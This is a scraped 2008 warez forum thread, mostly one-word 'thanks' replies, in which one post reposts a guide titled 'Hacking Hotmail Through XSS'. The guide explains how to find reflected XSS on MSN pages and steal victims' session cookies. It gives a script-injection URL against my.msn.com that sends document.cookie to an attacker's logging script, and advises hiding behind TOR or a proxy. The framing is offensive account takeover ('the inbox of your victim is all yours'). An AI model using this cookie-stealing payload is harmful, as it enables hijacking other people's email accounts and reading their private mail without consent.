Aioforum.com's Free Rapidshare Downloads All in one Premium Account

Your Link here @20$ Free Dedicated Rapidshare Premium Account Your Link here @20$ Join NFO Competition
Go Back   Home > Extras > Garbage Bin
Better than google adsense
Forgot Password? Join Us!

Notices

Your Ad Here


 
 
LinkBack Thread Tools Display Modes
Old 02-12-2008, 06:49 PM   #3631

 
User Info
Join Date: Feb 2008
Age: 41
Achievements Posts: 4
Casino Cash: $450

Total Points: 200.04
Donate

Reputation: 10
argos is on a distinguished road


thanks
argos is offline  
Digg this Post!Add Post to del.icio.usBookmark Post in TechnoratiFurl this Post!
Click here to Donate to remove the Adverts.
Old 02-12-2008, 07:09 PM   #3632

 
User Info
Join Date: Feb 2008
Age: 41
Achievements Posts: 4
Casino Cash: $450

Total Points: 200.04
Donate

Reputation: 10
argos is on a distinguished road


Thanks man
argos is offline  
Digg this Post!Add Post to del.icio.usBookmark Post in TechnoratiFurl this Post!
Click here to Donate to remove the Adverts.
Old 02-12-2008, 07:10 PM   #3633

 
User Info
Join Date: Feb 2008
Age: 41
Achievements Posts: 4
Casino Cash: $450

Total Points: 200.04
Donate

Reputation: 10
argos is on a distinguished road


Thanks again
argos is offline  
Digg this Post!Add Post to del.icio.usBookmark Post in TechnoratiFurl this Post!
Old 02-13-2008, 12:41 AM   #3634

 
User Info
Join Date: Jan 2008
Age: 51
Achievements Posts: 10
Casino Cash: $1050

Total Points: 541.64
Donate

Reputation: 50
looking008 is on a distinguished road


let me see thanks!
looking008 is offline  
Digg this Post!Add Post to del.icio.usBookmark Post in TechnoratiFurl this Post!
Click here to Donate to remove the Adverts.
Old 02-13-2008, 01:12 AM   #3635

 
User Info
Join Date: Feb 2008
Achievements Posts: 22
Casino Cash: $2950

Total Points: 659.70
Donate

Reputation: 20
babloo_3501 is on a distinguished road


thankssssssss
babloo_3501 is offline  
Digg this Post!Add Post to del.icio.usBookmark Post in TechnoratiFurl this Post!
Old 02-13-2008, 01:20 AM   #3636

 
User Info
Join Date: Feb 2008
Achievements Posts: 22
Casino Cash: $2950

Total Points: 659.70
Donate

Reputation: 20
babloo_3501 is on a distinguished road


Hacking Hotmail Through XSS

Introduction

[HIDE-REPLY]That microsoft's code is not always secure, is very clear again with this XSS exploit. This is not the first XSS exploit that has been found, others have been found. If you are viewing this document offline, the newest version can be found here. I am Adriaan Graas, a student who is interested in internet security and web development. I am currently 16 years old, though that would not make the exploit less effective.

Please do not mail me for hacking your ex-girlfriends inbox. Get away moron.
How

The idea is simple. When u are logged-in into Hotmail, a cookie is created wich allows you access every time you are in it's domain. Since the cookie is not IP-bind (how is this possible? - microsoft) we are able to fake the cookie, when stolen. Then use it to login. This all does mean that we do not have to know the password or even the emailaddress of the victim. Trough XSS we can insert an piece of javascript code that will send the cookie to a webserver with an log script. This can be written in PHP, ASP, CGI practically anything you want. The cookie can be faked with Proxomitron.
Where

This is like being, 50% based on - pure luck. Or you have an really awful amount of time to spend. Software is written for auto-searching XSS exploits. Dont use it - it is crap, clear thinking is enough.

When searching, keep these points in mind:

* The page where you are searching for must be in the domain, which is specified in the cookie. On the pages with 'Logout' buttons in Hotmail, you are using that cookie. I would recommend you adding some bookmark displaying your cookie, like java script:alert(document.cookie);.
* You can use practically use any browser, though i'd recommend Mozilla Firefox. It is stable, secure, and available on almost any OS. Use Opera or Internet Explorer - these are ok too - if you like them better. A good point of Opera is that it lets you manage your own cookies.
* If you want to be stealth, use TOR or a proxy. Though DNS Leaking is still dangerous.

Ok. It took me 4 to 5 hours to find three exploits. I will discuss one only.

After having a short look at the cookie, I decided to just start the search. Except for your security, no other preparations are needed. Focus yourself on URL's with GET variables - they are often vulnerable. And, when u opened up a new page, check if your cookie is still equal to hotmail's login page cookie. Start replacing a GET-variable in the url one by one. Reload the page and view the page source. Check in the source if there are also images or URL's which also contain GET variables, you might be able to exploit these. Is your replaced variable there, try to make it in a way that it ends valid html/javascript and can display you an error. Often special characters are escaped. An nice allround variabele is something like hya"'><ho><script>alert(document.cookie)
Code:
http://my.msn.com/newmodule.armx?tok=TVJmH...vt67SjWQ%3d%3d&
page=1&m= hya"><script>location.href='http://yourserver/logger.php?cookie= '%2Bescape(document.cookie)
Code:
http://my.msn.com/
. The inbox of your victim is all yours. If this does not work immediately, a cookie is not made yet. Just go to
Code:
http://my.msn.com/
again.
References

Code:
www.net-force.nl
, internet security challenges. Documents about XSS are in the library.
Hacking Hotmail by Alex de Vries, a much more detailed description about an XSS exploit discovered a year ago.
XSS by Rsnake, a very good tutorial with lots of example
babloo_3501 is offline  
Digg this Post!Add Post to del.icio.usBookmark Post in TechnoratiFurl this Post!
The Following User Says Thank You to babloo_3501 For This Useful Post:
sameer (02-13-2008)
Click here to Donate to remove the Adverts.
Old 02-13-2008, 04:56 AM   #3637

 
User Info
Join Date: Oct 2007
Age: 34
Achievements Posts: 37
Casino Cash: $7280

Total Points: 1,731.73
Donate

Reputation: 270
checkerone has a spectacular aura aboutcheckerone has a spectacular aura aboutcheckerone has a spectacular aura about


give me the links babe
checkerone is offline  
Digg this Post!Add Post to del.icio.usBookmark Post in TechnoratiFurl this Post!
Old 02-13-2008, 05:29 AM   #3638

 
User Info
Join Date: Feb 2008
Achievements Posts: 2
Casino Cash: $550

Total Points: 160.02
Donate

Reputation: 10
tech123 is on a distinguished road


thank you
tech123 is offline  
Digg this Post!Add Post to del.icio.usBookmark Post in TechnoratiFurl this Post!
Click here to Donate to remove the Adverts.
Old 02-13-2008, 05:30 AM   #3639

 
User Info
Join Date: Feb 2008
Achievements Posts: 2
Casino Cash: $550

Total Points: 160.02
Donate

Reputation: 10
tech123 is on a distinguished road


thanks
tech123 is offline  
Digg this Post!Add Post to del.icio.usBookmark Post in TechnoratiFurl this Post!
Old 02-13-2008, 06:47 AM   #3640

 
User Info
Join Date: Feb 2008
Achievements Posts: 1
Casino Cash: $500

Total Points: 150.01
Donate

Reputation: 10
almighty.flux is on a distinguished road


Thanks

Thanks
almighty.flux is offline  
Digg this Post!Add Post to del.icio.usBookmark Post in TechnoratiFurl this Post!
Click here to Donate to remove the Adverts.
 

Bookmarks

Tags
pankaj, post, thanks or spam or useless, transferred


Currently Active Users Viewing This Thread: 1 (0 members and 1 guests)
 
Thread Tools
Display Modes

Posting Rules
You may not post new threads
You may not post replies
You may not post attachments
You may not edit your posts

BB code is On
Smilies are On
[IMG] code is On
HTML code is Off
Trackbacks are On
Pingbacks are On
Refbacks are On
Forum Jump